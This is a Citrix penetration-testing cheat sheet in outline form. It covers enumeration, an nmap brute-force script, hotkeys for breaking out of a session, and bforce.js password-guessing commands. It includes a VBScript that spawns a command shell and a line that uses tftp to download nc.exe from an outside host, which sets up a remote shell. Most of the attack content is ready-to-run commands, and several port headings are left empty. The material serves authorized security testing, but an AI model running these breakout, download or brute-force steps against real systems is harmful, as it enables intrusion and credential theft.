|

Citrix Specific Testing:
Citrix provides remote access services to multiple users across a wide range of platforms. The following information will help you conduct a vulnerability assessment/ penetration test of Citrix implementations.
Enumeration
-
web search
-
Google (GHDB)
-
Google Hacks
-
Yahoo
-
site search
-
generic
-
nmap -A -PN -p 80,443,1494 ip_address
-
amap -bqv ip_address port_no.
-
citrix specific
-
Default Ports
-
TCP
-
Server to server
-
Management Console to server
-
Session Reliability (Auto-reconnect)
-
License Management Console
-
License server
-
UDP
-
-
-
-
-
-
nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>
Scanning
Exploitation
-
Alter default .ica files
-
Enumerate and Connect
-
Manual Testing
-
Create Batch File (cmd.bat)
-
-
Option Explicit
-
Dim objShell
-
Set objShell = CreateObject("WScript.Shell")
-
objShell.Run "%comspec% /k"
-
WScript.Quit
-
alternative functionality
-
objShell.Run "%comspec% /k c: & dir"
-
objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt"
-
objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-)
-
-
AT Command - priviledge escalation
-
Keyboard Shortcuts/ Hotkeys
-
Ctrl + h – View History
-
Ctrl + n – New Browser
-
Shift + Left Click – New Browser
-
Ctrl + o – Internet Address (browse feature)
-
Ctrl + p – Print (to file)
-
Right Click (Shift + F10)
-
Save Image As
-
View Source
-
F1 – Jump to URL
-
SHIFT+F1: Local Task List
-
SHIFT+F2: Toggle Title Bar
-
SHIFT+F3: Close Remote Application
-
CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
-
CTRL+F2: Remote Task List
-
CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
-
ALT+F2: Cycle through programs
-
ALT+PLUS: Alt+TAB
-
ALT+MINUS: ALT+SHIFT+TAB
-
Brute Force
-
-
bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2
-
bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt
-
bforce.js TCPBrowserAddress=ip-address usernames=user1,user2 passwords=pass1,pass2 timeout=5000
References
-
Vulnerabilities
-
Support
-
Exploits
-
Tutorials/ Presentations
-
Carnal0wnage
-
Foundstone
-
GNUCitizen
-
Packetstormsecurity
-
Insomniac Security
-
Aditya Sood
-
BlackHat
|
|
|